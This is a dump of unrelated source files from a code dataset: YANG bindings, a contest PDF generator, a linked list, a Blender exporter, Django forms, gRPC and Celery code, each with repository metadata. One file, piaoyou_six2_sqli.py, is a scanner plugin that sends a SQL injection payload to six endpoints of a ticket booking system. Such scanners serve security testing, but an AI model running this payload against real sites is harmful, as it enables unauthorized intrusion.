def _get_hide_mac_acl_ext(self):
"""
Getter method for hide_mac_acl_ext, mapped from YANG variable /mac/access_list/extended/hide_mac_acl_ext (container)
"""
return self.__hide_mac_acl_ext
def _set_hide_mac_acl_ext(self, v, load=False):
"""
Setter method for hide_mac_acl_ext, mapped from YANG variable /mac/access_list/extended/hide_mac_acl_ext (container)
If this variable is read-only (config: false) in the
source YANG file, then _set_hide_mac_acl_ext is considered as a private
method. Backends looking to populate this variable should
do so via calling thisObj._set_hide_mac_acl_ext() directly.
"""
if hasattr(v, "_utype"):
v = v._utype(v)
try:
t = YANGDynClass(v,base=hide_mac_acl_ext.hide_mac_acl_ext, is_container='container', presence=False, yang_name="hide-mac-acl-ext", rest_name="", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'cli-drop-node-name': None, u'hidden': u'wyser-write-hook'}}, namespace='urn:brocade.com:mgmt:brocade-mac-access-list', defining_module='brocade-mac-access-list', yang_type='container', is_config=True)
except (TypeError, ValueError):
raise ValueError({
'error-string': """hide_mac_acl_ext must be of a type compatible with container""",
'defined-type': "container",
'generated-type': """YANGDynClass(base=hide_mac_acl_ext.hide_mac_acl_ext, is_container='container', presence=False, yang_name="hide-mac-acl-ext", rest_name="", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'cli-drop-node-name': None, u'hidden': u'wyser-write-hook'}}, namespace='urn:brocade.com:mgmt:brocade-mac-access-list', defining_module='brocade-mac-access-list', yang_type='container', is_config=True)""",
})
self.__hide_mac_acl_ext = t
if hasattr(self, '_set'):
self._set()
def _unset_hide_mac_acl_ext(self):
self.__hide_mac_acl_ext = YANGDynClass(base=hide_mac_acl_ext.hide_mac_acl_ext, is_container='container', presence=False, yang_name="hide-mac-acl-ext", rest_name="", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'cli-drop-node-name': None, u'hidden': u'wyser-write-hook'}}, namespace='urn:brocade.com:mgmt:brocade-mac-access-list', defining_module='brocade-mac-access-list', yang_type='container', is_config=True)
name = __builtin__.property(_get_name, _set_name)
hide_mac_acl_ext = __builtin__.property(_get_hide_mac_acl_ext, _set_hide_mac_acl_ext)
_pyangbind_elements = {'name': name, 'hide_mac_acl_ext': hide_mac_acl_ext, }
| [
"[email protected]"
] | |
8d8bd2733afc957d19afad643b783047d417c231 | b40fbe6d0012a299b0e771d2e5f0cfca3fe5be2b | /gen_bulk.py | f4fad52f721f76c134105cc0a87572a95af0cbb3 | [] | no_license | olimpiadi-informatica/randomtex | e8555776daa3761b6014cdf006b9c903db7f0fb2 | 1da019715c44db6a51135cb02dbf5a4e52586a95 | refs/heads/main | 2023-04-14T15:15:25.641932 | 2021-04-26T13:57:47 | 2021-04-26T14:13:03 | 358,237,479 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,612 | py | #!/usr/bin/env python3
import argparse
import csv
import datetime
import json
import logging
import multiprocessing.dummy as mp
import os
import random
import shutil
import tempfile
import progressbar
import compilation
import utils
progressbar.streams.wrap_stderr()
logger = logging.getLogger("gen_bulk")
def process_user(user, args, work_dir):
contest_dir = args.contest_dir
rnd = random.Random(int(user["seed"]))
tex, sol, order = utils.render_contest(contest_dir, rnd, context=user)
user["solutions"] = ":".join(sol)
user["questions_order"] = ":".join(map(str, order))
filename = user["filename"]
password = user["pdf_password"]
target = os.path.join(args.output_pdf, filename)
if os.path.exists(target):
logger.warning("File %s already present, skipping...", target)
return user
with tempfile.NamedTemporaryFile(prefix=filename) as f:
compilation.compile(tex, f.name, work_dir)
if args.no_enc:
shutil.move(f.name, target)
else:
logger.info("Encrypting PDF %s -> %s", f.name, target)
utils.encrypt_pdf(f.name, target, password)
return user
def generate(args, work_dir, users):
contest_dir = args.contest_dir
compilation.setup(contest_dir, work_dir)
os.makedirs(args.output_pdf, exist_ok=True)
def process(user):
return process_user(user, args, work_dir)
result = []
widgets = [
"[",
progressbar.SimpleProgress(),
" / ",
progressbar.Percentage(),
"] ",
progressbar.Bar(),
" ",
progressbar.Timer(),
" | ",
progressbar.AdaptiveETA(samples=datetime.timedelta(seconds=10)),
]
with mp.Pool(args.num_cores) as pool:
for res in progressbar.progressbar(
pool.imap_unordered(process, users),
max_value=len(users),
redirect_stdout=True,
widgets=widgets,
):
if res:
result.append(res)
headers = list(result[0].keys())
with open(args.output_csv, "w") as f:
writer = csv.DictWriter(f, headers)
writer.writeheader()
writer.writerows(result)
def main(args):
with open(args.users_csv) as f:
reader = csv.DictReader(f)
users = list(reader)
if args.work_dir:
generate(args, args.work_dir, users)
else:
with tempfile.TemporaryDirectory() as work_dir:
generate(args, work_dir, users)
if __name__ == "__main__":
parser = argparse.ArgumentParser()
parser.add_argument(
"--work-dir",
"-w",
help="Working directory for the compilation",
)
parser.add_argument(
"--num-cores",
"-j",
help="Number of parallel compilations",
type=int,
)
parser.add_argument("--verbose", "-v", help="Verbose output", action="store_true")
parser.add_argument("--no-enc", help="Do not encrypt the pdfs", action="store_true")
parser.add_argument("contest_dir", help="Directory with the contest")
parser.add_argument("users_csv", help="Path to the csv file with the students data")
parser.add_argument(
"output_pdf",
help="Directory of where to save the compiled pdf files",
)
parser.add_argument(
"output_csv",
help="Path where to save the CSV with the solutions",
)
args = parser.parse_args()
logging.basicConfig(
level=logging.DEBUG if args.verbose else logging.INFO,
format="%(asctime)s [%(levelname)s] [%(name)s] %(message)s",
)
main(args) | [
"[email protected]"
] | |
658f73dbac10be5eab3b65886b7d63510a3112a7 | 37f3759ca34f20d065ed62c9f892004f3468d869 | /first.py | 9aac5b66135641c05b038a41b8fab12fcb597621 | [] | no_license | cmc5953/cmc5953 | faf0d4d17714ffae10c1d9017b88734bb0f171ba | 76a33411ed305ffa2b5d312699f747591e4147ef | refs/heads/master | 2022-04-05T20:51:10.914382 | 2020-03-02T00:30:18 | 2020-03-02T00:30:18 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 18 | py | print("firstfile") | [
"[email protected]"
] | |
f8938e7c7df3a92df60e420a4429cb058096a7e6 | 4be5c172c84e04c35677f5a327ab0ba592849676 | /python/data_structures/array/sll/sll.py | dbdb9af0a8277d797c590e960437f9b0ac88de97 | [] | no_license | niranjan-nagaraju/Development | 3a16b547b030182867b7a44ac96a878c14058016 | d193ae12863971ac48a5ec9c0b35bfdf53b473b5 | refs/heads/master | 2023-04-06T20:42:57.882882 | 2023-03-31T18:38:40 | 2023-03-31T18:38:40 | 889,620 | 9 | 2 | null | 2019-05-27T17:00:29 | 2010-09-05T15:58:46 | Python | UTF-8 | Python | false | false | 5,315 | py | '''
A SLL implemented using regular arrays
SLL corresponding to
78 -> 10 -> 41 -> 36 -> 21
is represented below
| Index | Node | Node |
| | data | next |
|-------+------+------|
| 0 | 10 | 7 |
| 1 | | |
| 2 | 36 | 9 |
| 3 | | |
| 4 | | |
head -> | 5 | 78 | 0 |
| 6 | | |
| 7 | 41 | 2 |
| 8 | | |
| 9 | 21 | -1 |
| 10 | | |
The underlying array for the SLL contains two disjoint lists
1. Available-list: contains a list of nodes that are available
2. Allocated-list: contains a list of nodes that are currently in use
'''
class SLL(object):
class Node(object):
def __init__(self, data=None, next=-1):
self.data = data
# next index == -1 implies there's no next link
self.next = next
def __repr__(self):
return str(self)
def __str__(self):
return str((self.data, self.next))
def __init__(self, capacity):
self.capacity = capacity
self._allocated = 0
# Initially all nodes are available
# chain them one-after-another sequentially
# into an available list
self._array = [SLL.Node(None, i+1) for i in xrange(self.capacity)]
self._array[-1].next = -1 # Tail of the available list
self.available_list = 0 # Index 0 is head of the available list
self.allocated_list = -1 # Allocated list is empty
self.allocated_tail = -1 # Allocated list is empty => tail: None
def __len__(self):
return self._allocated
def __str__(self):
lStr = '[{}]: '.format(len(self))
head = self.allocated_list
while head != -1:
lStr += str(self._array[head].data) + " -> "
head = self._array[head].next
return lStr
# Return a free node, initialized to 'data' from the available list.
# if there are any
# Raises MemoryError if the entire capacity of the array is currently allocated
def getNode(self, data):
if self.available_list == -1:
raise MemoryError("Linked list is at capacity")
node = self.available_list
self.available_list = self._array[self.available_list].next
self._array[node].next = -1
self._array[node].data = data
self._allocated += 1
return node
# Add a node back to the available list
def freeNode(self, node):
self._allocated -= 1
# blank data corresponding to the 'freed' node
# so all the nodes in the available list
# are blank signifying they are all re-usable containers
self._array[node].data = None
self._array[node].next = self.available_list
self.available_list = node
# Insert a node to the end of the SLL
def push_back(self, data):
# get a freenode from the available list
node = self.getNode(data)
if self.allocated_list == -1:
self.allocated_list = self.allocated_tail = node
return
self._array[self.allocated_tail].next = node
self.allocated_tail = node
# Insert a node at the front to the SLL
def push_front(self, data):
# get a freenode from the available list
node = self.getNode(data)
self._array[node].next = self.allocated_list
self.allocated_list = node
if self.allocated_tail == -1:
# First node being added to the SLL
# update tail
self.allocated_tail = node
# Remove a node from the front of the SLL
def pop_front(self):
if self.allocated_list == -1:
# Nothing to pop, list is empty
return None
node = self.allocated_list
data = self._array[node].data
self.allocated_list = self._array[self.allocated_list].next
if self.allocated_list == -1:
self.allocated_tail = -1
self.freeNode(node)
return data
# Remove a node from the end of the SLL
def pop_back(self):
if self.allocated_list == -1:
# Nothing to pop, list is empty
return None
node = self.allocated_list
while self._array[node].next != self.allocated_tail:
node = self._array[node].next
data = self._array[self.allocated_tail].data
self.freeNode(self.allocated_tail)
# There's only one node in the SLL
if node == self.allocated_list:
self.allocated_tail = self.allocated_list = -1
else:
self._array[node].next = -1
self.allocated_tail = node
return data
# Place 'data' in the SLL in its rightful place
# Uses cmp(data, x) {x: for each item in the SLL}
# Inserting only using 'place()' into the SLL will leave the SLL sorted
def place(self, data):
# get a freenode from the available list
node = self.getNode(data)
if self.allocated_list == -1:
self.allocated_list = self.allocated_tail = node
return
if data < self._array[self.allocated_list].data:
# current data is < everything in the SLL
self._array[node].next = self.allocated_list
self.allocated_list = node
return
if data >= self._array[self.allocated_tail].data:
# current data is > everything in the SLL
self._array[self.allocated_tail].next = node
self.allocated_tail = node
return
tmp = self.allocated_list
prev = None
while tmp != -1 and self._array[tmp].data <= data:
prev = tmp
tmp = self._array[tmp].next
# At this point, We have found a rightful place to insert current node
# prev is node after which 'data' needs to be inserted
self._array[prev].next = node
self._array[node].next = tmp
| [
"[email protected]"
] | |
2553bc5ec831453cc73c3732fdbffe014c7cf7ce | e82b761f53d6a3ae023ee65a219eea38e66946a0 | /All_In_One/addons/mc-animation-blender/operator_anim_export.py | 503e83160184e749fd854f38b8b1ff3864169f8f | [] | no_license | 2434325680/Learnbgame | f3a050c28df588cbb3b14e1067a58221252e2e40 | 7b796d30dfd22b7706a93e4419ed913d18d29a44 | refs/heads/master | 2023-08-22T23:59:55.711050 | 2021-10-17T07:26:07 | 2021-10-17T07:26:07 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 4,913 | py | import bpy
import math
import json
# ExportHelper is a helper class, defines filename and
# invoke() function which calls the file selector.
from bpy_extras.io_utils import ExportHelper
from bpy.props import StringProperty, BoolProperty, EnumProperty
from bpy.types import Operator
class operator_anim_export(Operator, ExportHelper):
"""This appears in the tooltip of the operator and in the generated docs"""
bl_idname = "mcanim.export" # important since its how bpy.ops.import_test.some_data is constructed
bl_label = "Export Minecraft Animation (.mcanim)"
# ExportHelper mixin class uses this
filename_ext = ".mcanim"
filter_glob = StringProperty(
default="*.mcanim",
options={'HIDDEN'},
maxlen=255, # Max internal buffer length, longer would be clamped.
)
# List of operator properties, the attributes will be assigned
# to the class instance from the operator settings before calling.
looping = BoolProperty(
name="Looping",
description="Should this animation loop?",
default=True,
)
resetWhenDone = BoolProperty(
name="Reset when done",
description="Should this reset to starting position when done?",
default=False,
)
id = StringProperty(
name="ID",
description="Unique numerical ID that Minecraft will refer to this animation by",
default='0',
)
def execute(self, context):
return export(context, self.id, self.looping, self.resetWhenDone, self.filepath)
# specific export function for menu
def export(context, id, looping, resetWhenDone, path):
return write_mcanim(context, context.scene.objects.active, int(id), looping, resetWhenDone, path)
# write animation to disk
def write_mcanim(context, object, id, looping, resetWhenDone, path):
frames = []
# output all frames into frames array
for i in range(context.scene.frame_start, context.scene.frame_end):
frames.append(write_frame(context,object,i))
# add additional metadata to file
output = {
"version": "0.2",
"id": id,
"looping": looping,
"resetPos": resetWhenDone,
"frames": frames
}
# create json string
formatted = json.dumps(output, sort_keys=True, indent=4, separators=(',', ': '))
# output to file
file = open(path, "w")
file.write(formatted)
file.close
print("Outputted to: "+path)
return {'FINISHED'}
# returns a dictionary with a single frame of animation
def write_frame(context, object, frame):
# make sure we're on the right frame
context.scene.frame_set(frame)
# get all the bones in the armature
bones = object.pose.bones
# get values from said bones
body = convert_array(get_rotation(bones['body']), False)
left_arm = convert_array(get_rotation(bones['left_arm']), False)
right_arm = convert_array(get_rotation(bones['right_arm']), False)
left_leg = convert_array(get_rotation(bones['left_leg']), False)
right_leg = convert_array(get_rotation(bones['right_leg']), False)
head = convert_array(get_rotation(bones['head']), True)
location = [round(bones['root'].location[0], 2), round(bones['root'].location[1], 2), round(bones['root'].location[2], 2)]
rotation = round(math.degrees(get_rotation(bones['root'])[1]), 2)
# output found values to dictionary
output = {
"body": body,
"left_arm": left_arm,
"right_arm": right_arm,
"left_leg": left_leg,
"right_leg": right_leg,
"head": head,
"location": location,
"rotation": rotation
}
return output
# returns the rotation in euler, no matter what it was initially in
def get_rotation(input):
if input.rotation_mode == 'QUATERNION':
return input.rotation_quaternion.to_euler()
else:
return input.rotation_euler
# takes an array attained by armature.pose.bones[bone].rotation_euler, converts it to degrees, and does correct formulas.
def convert_array(array, isHead):
if isHead:
new_array = [array[0]*-1, array[1]*-1, array[2]]
else:
new_array = [array[2], array[1], array[0]*-1]
new_array[0] = round(math.degrees(new_array[0]), 2)
new_array[1] = round(math.degrees(new_array[1]), 2)
new_array[2] = round(math.degrees(new_array[2]), 2)
return new_array
# Only needed if you want to add into a dynamic menu
def menu_func_export(self, context):
self.layout.operator(operator_anim_export.bl_idname, text="Minecraft Animation (.mcanim)")
def register():
bpy.types.INFO_MT_file_export.append(menu_func_export)
def unregister():
bpy.types.INFO_MT_file_export.remove(menu_func_export)
if __name__ == "__main__":
register()
| [
"[email protected]"
] | |
5270fd8590b0db70b57d80c3f96aa6bf2f4b6bb5 | 1ece2cecace68fb1f8879fbe705f615256bba77d | /src/web_mirror/_constants.py | b785a9cd9ad8586bd46d47fcfd619ae9946bece2 | [
"MIT"
] | permissive | nuuuwan/web_mirror | 7ac07d5ed2f11f2dc57bb5c3641311f08d6ffca7 | 52330f9869a2fbb95a9f5309d58e5d5953e6a693 | refs/heads/main | 2023-07-16T17:17:39.219621 | 2021-09-04T06:36:15 | 2021-09-04T06:36:15 | 402,963,316 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 65 | py | """Constants."""
CACHE_NAME = 'web_mirror'
CACHE_TIMEOUT = 3600
| [
"[email protected]"
] | |
936b3abfafeee8de92355161e81f2cf35625caf2 | 2d8d7fef8f914f1b2337ee5d6a2e7c61dab9ec4e | /基础知识/1.语法基础/13.dict字典-增删改查.py | 8ea74ff8b009cb80334f8c2c6f4eb2ba593b1051 | [] | no_license | kuaikang/python3 | bb5bb8d807c4a8818b18f0d4e598232cc73ab3af | 60ca72662c7a6e718190ffa6139a129c1412a3fb | refs/heads/master | 2021-04-28T10:32:25.416550 | 2018-07-06T01:59:47 | 2018-07-06T01:59:47 | 122,068,697 | 13 | 11 | null | null | null | null | UTF-8 | Python | false | false | 658 | py | print("字典是key-value的数据类型".center(50, "-"))
print("字典是无序的,key不能重复")
info = {"stu1": "tom", "stu2": "jack", "stu3": "lucy"}
print(info)
# 添加
info["stu4"] = "bob"
# 修改
info["stu1"] = "zhang"
# 删除
# info.pop("stu2") # 标准删除方法
# del info["stu3"]
# 查找
print('-----',info.get("stu11")) # 不存在的时候返回
# print(info["stu0"]) # 不存在时会报错
print(info)
print()
import sys
for key in info.keys():
sys.stdout.write(key + " ")
print()
for val in info.values():
sys.stdout.write(val + " ")
print()
for key, val in info.items():
sys.stdout.write(key + "-->" + val + " ")
| [
"[email protected]"
] | |
9b1336a598319774d6c7b2b0860e876c933a8cbc | c1fe97208afe479b7ae1ee67d69866a6911564ca | /Login/profilecreate/forms.py | 99f047fe4e0523e89dce7b7d71637698624e0c1c | [] | no_license | jaindhairyahere/Python_Django | a0a46c57b6ca60d0942ae181fe28ea56bb1ee948 | f170a2e38b78df698a02821a454a3baea0c358a6 | refs/heads/master | 2020-06-18T09:17:56.364928 | 2019-11-02T18:34:12 | 2019-11-02T18:34:12 | 196,249,108 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 633 | py | from django import forms
from django.contrib.auth.admin import User
from .models import Alumni
from django.core import validators
def check_PhoneNumber(value):
if len(value) != 10:
raise forms.ValidationError("Not a phone Number")
class UserForm(forms.ModelForm):
password = forms.CharField(widget = forms.PasswordInput())
class Meta():
model = User
fields = ('username','email','password',)
class AlumniForm(forms.ModelForm):
class Meta():
model = Alumni
exclude = ('user_model',)
class LoginForm(forms.Form):
username = forms.CharField(max_length=264)
password = forms.CharField(widget = forms.PasswordInput())
| [
"[email protected]"
] | |
e946bbe4ccbf8914231a25812913ff77829d1f28 | 545afb3cfe89f82b558faa5b5b28c28b8e3effce | /venv/Lib/site-packages/grpc/_plugin_wrapping.py | 6c925826d6f4cb8b3a86acd5ac23cf15ebe0b1e0 | [
"MIT"
] | permissive | parthpankajtiwary/keras-groundup | 24ad45a4b872e6d77fff8a6f4a3a6d60124a0628 | 0df0844e7d9dca741fad0965761a12f72ee51f07 | refs/heads/master | 2022-11-09T22:34:35.716466 | 2019-10-01T11:01:59 | 2019-10-01T11:01:59 | 210,914,101 | 0 | 1 | MIT | 2022-10-25T06:47:55 | 2019-09-25T18:31:49 | Python | UTF-8 | Python | false | false | 3,527 | py | # Copyright 2015 gRPC authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import collections
import logging
import threading
import grpc
from grpc import _common
from grpc._cython import cygrpc
_LOGGER = logging.getLogger(__name__)
class _AuthMetadataContext(
collections.namedtuple('AuthMetadataContext', (
'service_url',
'method_name',
)), grpc.AuthMetadataContext):
pass
class _CallbackState(object):
def __init__(self):
self.lock = threading.Lock()
self.called = False
self.exception = None
class _AuthMetadataPluginCallback(grpc.AuthMetadataPluginCallback):
def __init__(self, state, callback):
self._state = state
self._callback = callback
def __call__(self, metadata, error):
with self._state.lock:
if self._state.exception is None:
if self._state.called:
raise RuntimeError(
'AuthMetadataPluginCallback invoked more than once!')
else:
self._state.called = True
else:
raise RuntimeError(
'AuthMetadataPluginCallback raised exception "{}"!'.format(
self._state.exception))
if error is None:
self._callback(metadata, cygrpc.StatusCode.ok, None)
else:
self._callback(None, cygrpc.StatusCode.internal,
_common.encode(str(error)))
class _Plugin(object):
def __init__(self, metadata_plugin):
self._metadata_plugin = metadata_plugin
def __call__(self, service_url, method_name, callback):
context = _AuthMetadataContext(
_common.decode(service_url), _common.decode(method_name))
callback_state = _CallbackState()
try:
self._metadata_plugin(context,
_AuthMetadataPluginCallback(
callback_state, callback))
except Exception as exception: # pylint: disable=broad-except
_LOGGER.exception(
'AuthMetadataPluginCallback "%s" raised exception!',
self._metadata_plugin)
with callback_state.lock:
callback_state.exception = exception
if callback_state.called:
return
callback(None, cygrpc.StatusCode.internal,
_common.encode(str(exception)))
def metadata_plugin_call_credentials(metadata_plugin, name):
if name is None:
try:
effective_name = metadata_plugin.__name__
except AttributeError:
effective_name = metadata_plugin.__class__.__name__
else:
effective_name = name
return grpc.CallCredentials(
cygrpc.MetadataPluginCallCredentials(
_Plugin(metadata_plugin), _common.encode(effective_name)))
| [
"[email protected]"
] | |
7a4ccc2502dab8ff8f1958d5055642f4c92c18ce | bd9a09a3f1a8b2b5166c540ada93cc5b30591605 | /scanner/plugins/cms/piaoyou/piaoyou_six2_sqli.py | eec921a1b177ff73dbc2f527350a99da77615bf5 | [
"MIT"
] | permissive | iceyhexman/onlinetools | 3cb6e349fc30c515f96429abeab5fbcc430ac0cc | 61f2df7ff8e6ad97ca7901728c3ab749679a2bd0 | refs/heads/master | 2023-08-06T19:31:51.328657 | 2022-10-28T04:01:38 | 2022-10-28T04:01:38 | 119,565,769 | 1,662 | 358 | MIT | 2023-03-31T14:34:13 | 2018-01-30T16:51:46 | Python | UTF-8 | Python | false | false | 1,390 | py | #!/usr/bin/env python
# -*- coding: utf-8 -*-
'''
name: 票友机票预订系统6处SQL注入2(绕过)
referer: http://www.wooyun.org/bugs/wooyun-2015-0116851
author: Lucifer
description: multi sqli。
'''
import sys
import requests
class piaoyou_six2_sqli_BaseVerify:
def __init__(self, url):
self.url = url
def run(self):
headers = {
"User-Agent":"Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit/534.50 (KHTML, like Gecko) Version/5.1 Safari/534.50"
}
urls = ["/Parmset/sms_mb_edit.aspx?id=1",
"/Sales/meb_edit.aspx?id=1",
"/Sales/meb_his.aspx?id=1",
"/Other/hotel_edit.aspx?id=1",
"/Visa/visa_edit.aspx?id=1",
"/Visa/gjqz_add.aspx?id=214"]
try:
for url in urls:
vulnurl = self.url + url + "AnD/**/1=Sys.Fn_VarBinToHexStr(HashBytes(%27Md5%27,%271234%27))--"
req = requests.get(vulnurl, headers=headers, timeout=10, verify=False)
if r"81dc9bdb52d04dc20036dbd8313ed055" in req.text:
return "[+]存在票友机票预订系统SQL注入漏洞(绕过)...(高危)\tpayload: "+vulnurl
except:
return "[-]connect timeout"
if __name__ == "__main__":
testVuln = piaoyou_six2_sqli_BaseVerify(sys.argv[1])
testVuln.run()
| [
"[email protected]"
] | |
f0af40b807555df49c70d1410197dbfebf56faea | 46d2bb5c6d2ea91ac8a3fda0168cc99501b1abe4 | /middleware/client_test.py | 23a21e179175a2942d8e6f0cd79747b4b0f65bdf | [
"Apache-2.0"
] | permissive | Time1ess/VES | 2fe0a1c3371e243a377ad6a31df5d3b4651ddf4d | fe608b8ae469f81cc23b1ea30f02a1e68fac13ee | refs/heads/master | 2021-01-18T21:36:21.864535 | 2016-06-15T12:21:42 | 2016-06-15T12:21:42 | 52,199,990 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,793 | py | #!/usr/bin/python
# coding:utf-8
# Author: David
# Email: [email protected]
# Created: 2016-04-04 14:10
# Last modified: 2016-04-11 10:01
# Filename: client_test.py
# Description:
import socket
import time
import sys
import select
from random import randint
def Check_Identity(data):
if data == "VES":
return True
return False
if not sys.argv[1]:
name = raw_input("Enter type(v for video,d for display):")
else:
name = sys.argv[1]
broad_sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) #
broad_sock.bind(('', 8089))
data = None
addr = None
while True:
data, addr = broad_sock.recvfrom(4096)
if Check_Identity(data) is True:
break
broad_sock.close()
host = addr[0]
print 'Get broadcast message from host:', host
port = 8090 if name == "v" else 8092
ss = socket.socket(socket.AF_INET, socket.SOCK_STREAM) # send socket
ss.connect((host, port))
client = None
if name == "v":
sr = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sr.bind(('', 8091))
sr.listen(1)
client, addr = sr.accept()
print 'Get connected from middleware'
disconnected = False
while True:
if name == "v" and not disconnected:
rs, ws, es = select.select([client], [], [], 0.1)
for r in rs:
try:
msg = r.recv(4096)
disconnected = not msg
except:
disconnected = True
if r is client:
if disconnected:
print 'Middleware system disconnectd.'
break
else:
print '[Middleware msg] ', msg
try:
msg = repr(tuple([randint(0, 360) for x in xrange(3)]))
ss.send(msg)
except:
print 'Socket close.'
break
time.sleep(0.1)
| [
"[email protected]"
] | |
5e9365cd8fcdc3c33017a4fb7808aa0e14bf48f8 | 2e3e256bcc0086a61cbb0e082dc61290196e35d2 | /dragon/common/custom_backend_auth.py | c06f172b49bf3edcc9fa4ad9cf008c2682719502 | [
"Apache-2.0"
] | permissive | miradam/openstack-workload-disaster-recovery | 79dcdb15ebf95d89157751c750a5dbab1557b942 | 854a3952bb9278cc08017ada97ff150b12b1c687 | refs/heads/master | 2020-03-24T15:36:46.808591 | 2016-12-15T12:32:17 | 2016-12-15T12:32:17 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,087 | py | # vim: tabstop=4 shiftwidth=4 softtabstop=4
# Copyright (C) 2012, Red Hat, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or
# implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""
Middleware for authenticating against custom backends.
"""
import logging
from dragon.openstack.common import local
from dragon.rpc import client as rpc_client
import webob.exc
LOG = logging.getLogger(__name__)
class AuthProtocol(object):
def __init__(self, app, conf):
self.conf = conf
self.app = app
def __call__(self, env, start_response):
"""
Handle incoming request.
Authenticate send downstream on success. Reject request if
we can't authenticate.
"""
LOG.debug('Authenticating user token')
context = local.store.context
engine = rpc_client.EngineClient()
authenticated = engine.authenticated_to_backend(context)
if authenticated:
return self.app(env, start_response)
else:
return self._reject_request(env, start_response)
def _reject_request(self, env, start_response):
"""
Redirect client to auth server.
:param env: wsgi request environment
:param start_response: wsgi response callback
:returns HTTPUnauthorized http response
"""
resp = webob.exc.HTTPUnauthorized("Backend authentication failed", [])
return resp(env, start_response)
def filter_factory(global_conf, **local_conf):
conf = global_conf.copy()
conf.update(local_conf)
def auth_filter(app):
return AuthProtocol(app, conf)
return auth_filter
| [
"[email protected]"
] | |
a216e6e27226559c893a544e64f063b65a73dc33 | e3bbbb5018baad3cd2a2daf10e315a2e12aec974 | /ichnaea/async/schedule.py | 129cd2fffdcfed4b50627ec2d05e94d081463a88 | [
"Apache-2.0"
] | permissive | ingle/ichnaea | 5980de0532b012af7e48fa89bad7516adb84d24e | ed467538b6e61cf7c7921cd4aacb32ee039d13aa | refs/heads/master | 2021-01-17T14:23:32.369530 | 2016-01-12T20:29:38 | 2016-01-12T20:29:38 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 4,476 | py | """
Contains the `Celery Beat schedule
<http://celery.rtfd.org/en/latest/userguide/periodic-tasks.html>`_.
"""
from datetime import timedelta
from celery.schedules import crontab
from ichnaea.models import (
CellShard,
DataMap,
WifiShard,
)
def celerybeat_schedule(app_config):
"""Return the celery beat schedule as a dictionary."""
sections = app_config.sections()
schedule = {
# Monitoring
'monitor-queue-size': {
'task': 'ichnaea.data.tasks.monitor_queue_size',
'schedule': timedelta(seconds=60),
'options': {'expires': 57},
},
'monitor-api-users': {
'task': 'ichnaea.data.tasks.monitor_api_users',
'schedule': timedelta(seconds=600),
'options': {'expires': 570},
},
'monitor-api-key-limits': {
'task': 'ichnaea.data.tasks.monitor_api_key_limits',
'schedule': timedelta(seconds=600),
'options': {'expires': 570},
},
# Statistics
'update-statcounter': {
'task': 'ichnaea.data.tasks.update_statcounter',
'args': (1, ),
'schedule': crontab(minute=3),
'options': {'expires': 2700},
},
'update-statregion': {
'task': 'ichnaea.data.tasks.update_statregion',
'schedule': crontab(minute=5),
'options': {'expires': 2700},
},
# Data Pipeline
'schedule-export-reports': {
'task': 'ichnaea.data.tasks.schedule_export_reports',
'schedule': timedelta(seconds=8),
'options': {'expires': 15},
},
'update-cellarea': {
'task': 'ichnaea.data.tasks.update_cellarea',
'schedule': timedelta(seconds=8),
'args': (100, ),
'options': {'expires': 15},
},
'update-cellarea-ocid': {
'task': 'ichnaea.data.tasks.update_cellarea_ocid',
'schedule': timedelta(seconds=9),
'args': (100, ),
'options': {'expires': 15},
},
'update-score': {
'task': 'ichnaea.data.tasks.update_score',
'args': (250, ),
'schedule': timedelta(seconds=9),
'options': {'expires': 10},
},
}
for shard_id in CellShard.shards().keys():
schedule.update({
'update-cell-' + shard_id: {
'task': 'ichnaea.data.tasks.update_cell',
'schedule': timedelta(seconds=7),
'args': (500, shard_id),
'options': {'expires': 10},
}
})
for shard_id in DataMap.shards().keys():
schedule.update({
'update-datamap-' + shard_id: {
'task': 'ichnaea.data.tasks.update_datamap',
'args': (500, shard_id),
'schedule': timedelta(seconds=14),
'options': {'expires': 20},
},
})
for shard_id in WifiShard.shards().keys():
schedule.update({
'update-wifi-' + shard_id: {
'task': 'ichnaea.data.tasks.update_wifi',
'schedule': timedelta(seconds=6),
'args': (500, shard_id),
'options': {'expires': 10},
}
})
if 'assets' in sections and app_config.get('assets', 'bucket', None):
# only configure tasks if target bucket is configured
schedule.update({
'cell-export-full': {
'task': 'ichnaea.data.tasks.cell_export_full',
'schedule': crontab(hour=0, minute=13),
'options': {'expires': 39600},
},
'cell-export-diff': {
'task': 'ichnaea.data.tasks.cell_export_diff',
'schedule': crontab(minute=3),
'options': {'expires': 2700},
},
})
if 'import:ocid' in sections:
schedule.update({
'monitor-ocid-import': {
'task': 'ichnaea.data.tasks.monitor_ocid_import',
'schedule': timedelta(seconds=600),
'options': {'expires': 570},
},
'cell-import-external': {
'task': 'ichnaea.data.tasks.cell_import_external',
'args': (True, ),
'schedule': crontab(minute=52),
'options': {'expires': 2700},
},
})
return schedule
| [
"[email protected]"
] | |
